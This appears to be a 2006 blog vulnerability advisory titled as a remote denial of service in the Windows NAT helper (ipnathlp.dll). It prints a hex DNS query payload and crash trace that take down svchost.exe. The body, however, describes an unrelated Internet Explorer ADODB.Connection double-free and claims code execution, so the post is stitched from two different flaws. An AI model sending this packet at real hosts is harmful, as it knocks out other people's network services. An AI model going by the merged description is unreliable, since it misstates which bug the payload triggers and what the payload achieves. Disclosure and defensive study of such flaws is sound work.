Friday, 27 October 2006

NAT Helper Components [ipnathlp.dll] Remote DOS

Vendor:: Microsoft
Application:: Internet Explorer
Disclosed:: 27-10-06
Description:: The "Execute" method of ADODB.Connection.2.7 and ADODB.Connection.2.8 objects allow malicious script to free heap memory in a way that circumvents the script interpreter's memory manager. The second argument to Execute, a variant, is passed to VariantClear, which will free the associated string memory using SysFreeString if the variant represents a BSTR. The script interpreter has no way of knowing that the string memory was freed, and may try to double-free or re-use the memory after the Execute call returns.
The original proof-of-concept passes references to a single large string as both the second and third arguments of Execute. The string memory is freed when the second argument is passed to VariantClear, causing the memory to be decommitted due to its size, but then the code responsible for processing the third argument attempts to access the now-freed memory and produces the observed crash. By using a smaller string, the decommit will not occur, and double-frees and free memory reuse are therefore possible.
Exploitation is complicated by memory caching and garbage collection behaviors, but arbitrary memory overwrites due to heap corruption have been demonstrated.
Exploit:: Arbitrary code execution under the logged in user
 Exploit( --> Microsoft NAT( --> [..Internet..]

[Process svchost.exe, module ipnathlp]
--> MOV DL, [EAX]
Exception C0000005 (ACCESS_VIOLATION reading [00000000])
buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0) "\x03\x77\x77\x77" # "\x06\x67\x6f\x6f" # "\x67\x6c\x65\x03" # "\x63\x6f\x6d\x00" # Name: "\x00\x01" # Type: A (Host address) "\x00\x01" # Class: IN (0x0001) )

An ActiveX remote code execution vulnerability has a very high impact since the source of the malicious payload can be any site on the Internet. An even more critical problem is generated when clients are administrators on their local hosts, which would run the malicious payload with Administrator credentials.
Prevention::The best form is available by kill-bitting the CLSIDs for the ADODB.Connection ActiveX Control (00000514-0000-0010-8000-00AA006D2EA4) following the directions of KB240797. This will disable both ActiveX objects, regardless of version.
MSRC Blog Post
First Public PoC Code Disclosure (Denial of Service)

No comments: